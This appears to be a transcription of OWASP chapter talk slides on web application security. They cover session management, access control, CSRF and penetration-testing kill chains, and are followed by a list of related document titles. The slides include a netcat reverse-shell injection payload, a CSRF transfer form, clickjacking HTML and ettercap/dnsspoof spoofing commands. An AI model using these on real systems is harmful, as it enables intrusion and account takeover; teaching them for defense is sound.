OWASP Application Security Building and Breaking Applications
|
|
|
- Leslie Black
- 9 years ago
- Views:
Transcription
1 OWASP Application Security Building and Breaking Applications Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected]
2 Who's? Principal Security Consultant Durkee Consulting Inc. Founder of Rochester OWASP Past President of Rochester ISSA Application Security Consulting, development, auditing, application penetration testing Penetration Tester, Security Trainer, Incident Handler and Auditor Certifications: CISSP, C EH, GSEC, GCIH, GSNA, GCIA, GPEN 2
3 Agenda Why Application Security? Application Penetration Testing Basics OWASP Top 10 A2 Broken Auth and Session Management A7 Missing Functional Level Control A8 Cross-Site Request Forgery OWASP Secure Coding Principles SCP3 - Principle of Least Privilege SCP4 - Principle of Defense in Depth Penetration Testing Kill Chain Examples 3
4 Application Security is Hot Information Security is Hot Cisco estimates a million unfilled security jobs worldwide. (Network World - Mar 2015) Application Development is even Hotter 10 hottest IT skills for 2015 (Network World Nov 2014) #1 = Programming/Application Development #4 = Security/Compliance Governance #5 = Web Development Combine both: Application Security if you really want to be in demand 4
5 Why is Application Security so Hot? App Security is both Critical and Challenging Three Major Attack Trends (same since 2004) Clients Attacks (via , web, phishing) Targeted Attacks (esp. against Mid-sized org's) Application Attacks Traditional Network Security isn't sufficient Web Application Firewalls are helpful, but not sufficient Applications must protect themselves 5
6 Attacks, Layers & Security Controls Attack Layers of the Stack Security Controls Network Protocols Firewalls, Routers, VPNs, IDS & IPS and Vulnerability Scanners Operating Systems Operating System Patches and Configuration, Authentication, Authorization, Encryption, and Vulnerability Scanners Commercial and Open Source Development Platforms & Application Tiers Minimize Services, Application Configuration, Patches, Application Level Authentication Authorization, and Vulnerability Scanners Custom Application Code Secure Software Development Life-cycle, Application Vulnerability Scanners, Application Penetration Testing & Abuse Case Testing People and Processes User Training Against Social Engineering & Phishing 6
7 App Security is Hard! Android StageFright Vulnerability Announce July First fixes available in early Aug, left the libstagefright still with vulnerabilities More patches rolled out in August Many many more examples where large, well funded organizations don't get software security right on the first or even on the second try. 7
8 What makes App Security so Hard? Applications are often a complex with many layers The Attacker only needs one weakness in any one layer or component Application Security isn't a priority at the top of most organizations Custom application requires custom security Application Penetration Testing is cool, I love it, but I admit it doesn't solve the root problem. Jeff Williams, 2009 AppSec: We can't hack ourselves secure Application Security is relatively expensive, as it isn't a one time cost or one time fix but must be integrated into the development life-cycle. Applications must protect themselves 8
9 Application Penetration Testing Basics: Using a Proxy Tool: Proxy such as Burp or OWASP ZAP Proxies between the Browser and Web App, or between the Mobile App and the Web Service 9
10 Application Penetration Testing Basics: Using a Proxy (2) Everything can be modified (cookies, headers, hidden and normal parameters) Look for what is assumed or what is trusted Example: change AccessControlMatrix.help to AccessControlMatrix.help"%26nc%20pt_laptop%20443 %20"/bin/bash 10
11 Application Penetration Testing Basics: Using a Proxy (3) Exploit Results Connection to PT netcat listener with ping cmd executed as evidence. # netcat vnl 443 Connection from port 443 [tcp/*] accepted ping c # tcpdump nn host and icmp tcpdump: verbose output suppressed, use v or vv for full protocol decode listening on eth0, link type EN10MB (Ethernet), capture size byte 13:21: IP > : ICMP echo request, id 4012, seq 1, length 64 13:21: IP > : ICMP echo reply, id 4012, seq 1, length 64 11
12 OWASP Top 10 Three of the OWASP Top 10 A1 Injection A6 Sensitive Data Exposure A2 - Broken Authentication and A7 Missing Function Level Session Management Access Control A3 Cross-Site Scripting (XSS) A8 - Cross-Site Request Forgery (CSRF) A4 Insecure Direct Object References A5 Security Misconfiguration A9 - Using Components with Known Vulnerabilities A10 Unvalidated Redirects and Forwards 12
13 OWASP Top 10 A2: Broken Auth and Session Management A2 RISKS Authentication and session management are often not implemented correctly Attackers may steal, discover, guess, or fix the session ID value. Having the session ID allows the attacker to assume the users identity and privileges 13
14 OWASP Top 10 A2: Broken Auth and Session Management A2 ATTACKS Guessing of Session IDs can be easily automated Sessions IDs can be disclosed via Cross-site scripting to send the session ID to the attacker Disclosed over the network via HTTP Disclosed by MITM due to weak HTTPS configurations Disclosed in a URL Disclosed in a session on shared computer Sessions IDs can be predetermined via Session Fixation attacks. (The attacker provides a session ID via phishing, XSS, or malicious website) 14
15 OWASP Top 10 A2: Broken Auth and Session Management A2 DEFENSES Do NOT roll-your-own authentication or Session management, it is really hard! Use a built-in session management. Session IDs must be long and unpredictable ( >= 128 bits / 16 bytes) Server side Session timeout and invalidation Change value when privileges change (such as login) Stored in Cookie with Secure & HttpOnly flags & limited domain and path attributes, expires at end of the session See Also 15
16 OWASP Top 10 A7: Missing Functional Level Access Control A7 RISKS Access rights are checked before the functionality is made visible in the UI. Then the application fails to verify the same access rights on the server when the function is accessed. Attackers may access privileged functions by forceful browsing or a forged requests without proper authorization. 16
17 OWASP Top 10 A7: Missing Functional Level Access Control A7 ATTACKS Forceful Browsing - Just entering the correct URL in the browser to access the privileged operations Parameter Tampering May change parameters values beyond the listed options. Forged Request Just because a form wasn't provided doesn't mean a request can't be submitted. 17
18 OWASP Top 10 A7: Missing Functional Level Access Control A7 DEFENSES Authorization module should be consistent and easy to analyze so that it can be audited Authorization should deny access by default. Authorization module should be external to the main code, so that it's not hard coded in each page or function. For example some application frameworks may check privileges before access to specific paths or directories. 18
19 OWASP Top 10 A8: Cross-Site Request Forgery A8 RISKS A CSRF attack tricks a logged-on victim s browser to send a forged request The request includes the victim s session cookie so that it is authenticated and authorized The application accepts the request as legitimate Forged request may be created via XSS, Phishing, Malicious or compromised website, or other techniques. 19
20 OWASP Top 10 A8: Cross-Site Request Forgery A8 ATTACKS High value operations that change the state of the application are targeted, such as Change the password, or account details Admin operations such as create account or change the security options. Make purchases or transfer money Creating a Phishing with malicious link, and/or place the attack on a website. Inject the attack code via MITM attacks 20
21 OWASP Top 10 A8: Cross-Site Request Forgery A8 ATTACK EXAMPLES Forged request to enable external access to a firewall or VPN Change account , or password Change account physical shipping address Transfer funds to another account. <form action=" method="post"> <input type="hidden" name="acct" value="durkee"/> <input type="hidden" name="amount" value="100000"/> <input type="submit" value="view my pictures"/> </form> 21
22 OWASP Top 10 A8: Cross-Site Request Forgery A8 DEFENSES Include a Anti-CSRF token in each requests. The token must be unpredictable Must change at least per session Must validated correct token on the server Use hidden field, rather than URL parameter Can be used across the entire application or just for sensitive operations. OWASP CSRF Guard or OWASP ESAPI can be used for Java,.Net or PHP. Alternative may require re-authentication, or use CAPTCHA instead of a random token. 22
23 OWASP Secure Coding Principles SCP1 Minimize Attack Surface Area SCP2 Establish Secure Defaults SCP3 Principle of Least Privilege SCP4 Principle of Defense in Depth SCP5 Fail Securely SCP6 Don t Trust Services SCP7 Separation of Duties SCP8 Avoid Security by Obscurity SCP9 Keep Security Simple SCP10 Fix Security Issues Correctly 23
24 OWASP SCP3 Principle of Least privilege Accounts are given least privileges required to perform their operations Applies to user accounts, and especially to application accounts Do not use administrative accounts for application access Use read-only access when possible Limit DB access to specific tables, or at least to specific database. Use separate accounts for sensitive information. 24
25 OWASP SCP4 Principle of Defense in depth Multiple layers of controls are necessary A single control will fail at some time and is insufficient by itself Over time application modules are used in ways not originally anticipated Each software module should validate inputs and sanitize or encode its outputs appropriately. Generate error logs of failed operations. 25
26 Application Exploit Kill Chain Example 1 The Vulnerabilities Application Exploit Kill Chain - Attackers exploit multiple vulnerabilities to accomplish their goal Step 1) Recon Testing: The attacker probes and tests the web application to discover the vulnerabilities. V1 - Application is only partially HTTPS enabled. Credentials are sent via HTTPS, but initial page and some scripts are accessed via HTTP. V2 - The application is vulnerable to CSRF on administrative operations V3 The application is vulnerable to click-jacking. 26
27 Application Exploit Kill Chain Example 1 The Attack Step 2) CSRF: The attacker creates a CSRF form to create a new administrative user with a chosen name and password provided in hidden fields. Visually the form is just one big submit button. Step 3) ClickJack: A web page is created with the web application in an iframe, but the CSRF form is placed invisibly in front of the web application for the ClickJack attack. (actually we'll use 40% opaque in order to see the attack) 27
28 Example Clickjack w/ CSRF- <head> <head> <style type="text/css"><! *{ margin:0; padding:0; } Body { background:#ffffff; }... #content { width: 700px; height: 700px; margin top: 150px ; margin left: 150px; } #clickjack { position: absolute; left: 172px; top: 60px; filter: alpha(opacity=40); opacity:0.4 } // ></style> 28 </head>
29 Example Clickjack w/ CSRF - <body> <body> <div id="content"> <iframe src=" width="600" height="600" > </iframe> </div> <iframe id="clickjack" src="csrf1.html" width="500" height="500" scrolling="no" frameborder="none"> </iframe> </body> 29
30 Application Exploit Kill Chain Example 1 The Attack (2) Step 4) The attacker uses DNS spoofing of badapp.example.com to draw the victim to the malicious web page. We'll use ettercap for arp spoofing combined with dnsspoof this time. Gateway = and Victim = # cat spoof_hosts # (Attacker's malicious website) badapp.example.com Perform two way ARP spoof between victim and gateway. # ettercap i eth0 Tq M arp / / / / Spoofs DNS reply for badapp when it sees the DNS request # dnsspoof i eth0 f spoof_hosts dnsspoof: listening on eth0 [udp dst port 53 and not src ] > : A? badapp.example.com > : A? badapp.example.com 30
31 Application Exploit Kill Chain Example 1 The Result 31
32 Application Exploit Kill Chain Example 2 Example 2: Application Vulnerabilities V1 - Application discloses detailed system runtime information to administrative users including running process environment variables and start up options. V2 The middleware application account and password are passed to the application as a command line argument instead of from a protected file. V3 The application uses an administrative account to access the middleware. V4 The URL for detailed system runtime information is accessible using forceful browsing by external nonadmin users. 32
33 Application Exploit Kill Chain Example 2 Attack 1. Login as an external unprivileged customer 2. Copy the URL for system runtime information into the browser. 3. Search for and collect the middleware login and password. 4. Unfortunately, getting external access to the middleware is not in scope. Remember: Professionals always stay in scope! 33
34 OWASP Application Security Summary App Security is very challenging and often not well understood Knowing how to build secure and break insecure applications are important, in-demand skills Professional App Pen Testers always get permission first and stay within scope. Use OWASP Resources like WebGoat to train yourself Attend a OWASP chapter meetings and conferences. Sign-up on Rochester OWASP Chapter mailing lists 34
35 OWASP Application Security Building and Breaking Applications THANK YOU! - Durkee Consulting, Inc. [email protected]
36 Resources - Non-Profit Groups & Events OWASP Rochester Chapter OWASP Top 10 OWASP Secure Coding Principles Rochester ISSA Chapter Rochester Security Summit
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
OWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
State of Web Application Security. Ralph Durkee Durkee Consulting, Inc. Rochester ISSA & OWASP Chapters [email protected]
Ralph Durkee Durkee Consulting, Inc. Rochester ISSA & OWASP Chapters [email protected] Ralph Durkee Founder of Durkee Consulting since 1996 Founder of Rochester OWASP since 2004 President of Rochester ISSA chapter
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Web Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel [email protected]
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Testing the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 [email protected] Who Are
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
Cloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
Adobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
OWASP AND APPLICATION SECURITY
SECURING THE 3DEXPERIENCE PLATFORM OWASP AND APPLICATION SECURITY Milan Bruchter/Shutterstock.com WHITE PAPER EXECUTIVE SUMMARY As part of Dassault Systèmes efforts to counter threats of hacking, particularly
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
Web Application Security
Web Application Security Security Mitigations Halito 26 juni 2014 Content Content... 2 Scope of this document... 3 OWASP Top 10... 4 A1 - Injection... 4... 4... 4 A2 - Broken Authentication and Session
Application Security Best Practices. Wally LEE <[email protected]> Principal Consultant
Application Security Best Practices Wally LEE Principal Consultant 17/18 March 2009 Speaker Profile Wally LEE CISSP BS7799 Lead Auditor Certified Ultimate Hacking Instructor Certified
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability
Sichere Software- Entwicklung für Java Entwickler
Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART
Secure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only
Conducting Web Application Pentests From Scoping to Report For Education Purposes Only Web App Pen Tests According to OWASP: A Web Application Penetration Test focuses only on evaluating the security of
elearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
Using Free Tools To Test Web Application Security
Using Free Tools To Test Web Application Security Speaker Biography Matt Neely, CISSP, CTGA, GCIH, and GCWN Manager of the Profiling Team at SecureState Areas of expertise: wireless, penetration testing,
Lecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6 Ensuring compliance for PCI DSS 6.5 and 6.6 Page 2 Overview Web applications and the elements surrounding them
Passing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
Enterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
Web App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Nuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH [email protected] January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant What infrastructure security really means? Infrastructure Security is Making sure that your system services are always running
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
Application Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
Web Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
Web Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
Client logo placeholder XXX REPORT. Page 1 of 37
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services
WEB SITE SECURITY Jeff Aliber Verizon Digital Media Services 1 SECURITY & THE CLOUD The Cloud (Web) o The Cloud is becoming the de-facto way for enterprises to leverage common infrastructure while innovating
Members of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems
Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
Overview of the Penetration Test Implementation and Service. Peter Kanters
Penetration Test Service @ ABN AMRO Overview of the Penetration Test Implementation and Service. Peter Kanters ABN AMRO / ISO April 2010 Contents 1. Introduction. 2. The history of Penetration Testing
Security features of ZK Framework
1 Security features of ZK Framework This document provides a brief overview of security concerns related to JavaScript powered enterprise web application in general and how ZK built-in features secures
Columbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
Web Application Security
Chapter 1 Web Application Security In this chapter: OWASP Top 10..........................................................2 General Principles to Live By.............................................. 4
Architectural Design Patterns. Design and Use Cases for OWASP. Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. http://www.owasp.
Architectural Design Patterns for SSO (Single Sign On) Design and Use Cases for Financial i Web Applications Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. OWASP Copyright The OWASP Foundation Permission
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
Next Generation Clickjacking
Next Generation Clickjacking New attacks against framed web pages Black Hat Europe, 14 th April 2010 Paul Stone [email protected] Coming Up Quick Introduction to Clickjacking Four New Cross-Browser
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek ([email protected])
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek ([email protected]) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
Attack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes [email protected] The Attack Vector Details report provides details of vulnerability
Java Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
ETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
MatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
Network Security Exercise #8
